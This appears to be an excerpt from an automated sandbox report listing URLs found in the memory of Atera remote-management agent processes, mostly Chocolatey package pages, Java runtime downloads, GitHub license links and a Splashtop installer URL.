                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdkopenj9jre/16.0.1.900
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/asciidoctorj/2.5.13
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/corretto8jre/8.432.6.1
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/flyway.commandline.withjre/10.21.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/javaruntime-platformspecific/7.0.79.20161125
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/javaruntime/8.0.431
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/josm/19265.0.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/jre6/6.0.43
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/jre8/8.0.431
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/liberica17jre/17.0.13.12
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/libericajre/21.0.5.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/openjdk11jre/11.0.16.20220913
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/openjdk8jre/8.342.07.20220913
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/server-jre/8.0.192
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/server-jre10/10.0.1
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/server-jre8/8.0.202
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/smartgit-with-jre/7.1.1
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/teamcity-preinstalledjre/2024.12.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/teamcity/2024.12.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/TeamCity-OpenJDK8)
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/TeamCity-PreinstalledJRE)
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/Temurin11jre/11.0.25.9
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/Temurin17jre/17.0.13.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/Temurin21jre/21.0.5.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/Temurin8jre/8.432.6
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/Temurinjre/21.0.5.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk11jre/11.0.11.901
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk11openj9jre/11.0.11.900
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk12jre/12.0.2.10
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk14jre/14.0.2.1200
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk8jre/8.292.10.901
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk8openj9jre/8.292.10
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdkjre/16.0.1.901
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdkopenj9jre/16.0.1.900
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/asciidoctorj/2.5.13
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/corretto8jre/8.432.6.1
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/flyway.commandline.withjre/10.21.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/javaruntime-platformspecific/7.0.79.20161125
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/javaruntime/8.0.431
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/josm/19265.0.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/jre6/6.0.43
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/jre8/8.0.431
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/liberica17jre/17.0.13.12
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/libericajre/21.0.5.11jdk-16.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/openjdk11jre/11.0.16.20220913
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/openjdk8jre/8.342.07.20220913
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/server-jre/8.0.192
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/server-jre10/10.0.1
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/server-jre8/8.0.202
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/smartgit-with-jre/7.1.1
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/teamcity-preinstalledjre/2024.12.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/teamcity/2024.12.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://confluence.jetbrains.com/display/TW/TeamCity
                                Source: powershell.exe, 0000001F.00000002.2124156112.0000022F5CAF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 0000001F.00000002.2124156112.0000022F5CAF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 0000001F.00000002.2124156112.0000022F5CAF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://corretto.aws/downloads/resources/8.432.06.1/amazon-corretto-8.432.06.1-windows-x64-jre.msi
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.aws.amazon.com/corretto/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.jetbrains.com/teamcity/TeamCity-2024.12.tar.gz
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.splashtop.com
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001AA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001CF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.splashtop.com/csrs/Splashtop_Streamer_Win_DEPLOY_INSTALLER_v3.7.2.4.exe
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://flywaydb.org/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://flywaydb.org/assets/logo/flyway-logo-tm-sm.png
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://flywaydb.org/documentation/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://flywaydb.org/documentation/releaseNotes
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk11/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk11u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk12u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk14u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk16/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk8u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk11-binaries/releases/download/jdk-11.0.11%2B9_openj9-0.26.0/O
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk12-binaries/releases/download/jdk-12.0.2%2B10/OpenJDK12U-jre_
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk14-binaries/releases/download/jdk-14.0.2%2B12/OpenJDK14U-jre_
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk16-binaries/releases/download/jdk-16.0.1%2B9_openj9-0.26.0/Op
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/jdk8u292-b10_openj9-0.26.0/OpenJ
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Claud/chocolatey-packages
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/IdealChain/chocolatey-packages/tree/master/josm
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1984126068.000002156C344000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2125952751.000001F735E52000.00000002.00000001.01000000.00000025.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2463044015.0000022B9B020000.00000002.00000001.01000000.00000038.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll1.13.drString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Roemer/chocolatey-packages
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/jdk11u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/jdk17/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/jdk21/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/jdk8u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin11-binaries/releases/download/jdk-11.0.24%2B8/OpenJDK11U-jre_x86-
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin11-binaries/releases/download/jdk-11.0.25%2B9/OpenJDK11U-jre_x64_
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin17-binaries/releases/download/jdk-17.0.12%2B7/OpenJDK17U-jre_x86-
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin17-binaries/releases/download/jdk-17.0.13%2B11/OpenJDK17U-jre_x64
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin21-binaries/releases/download/jdk-21.0.5%2B11/OpenJDK21U-jre_x64_
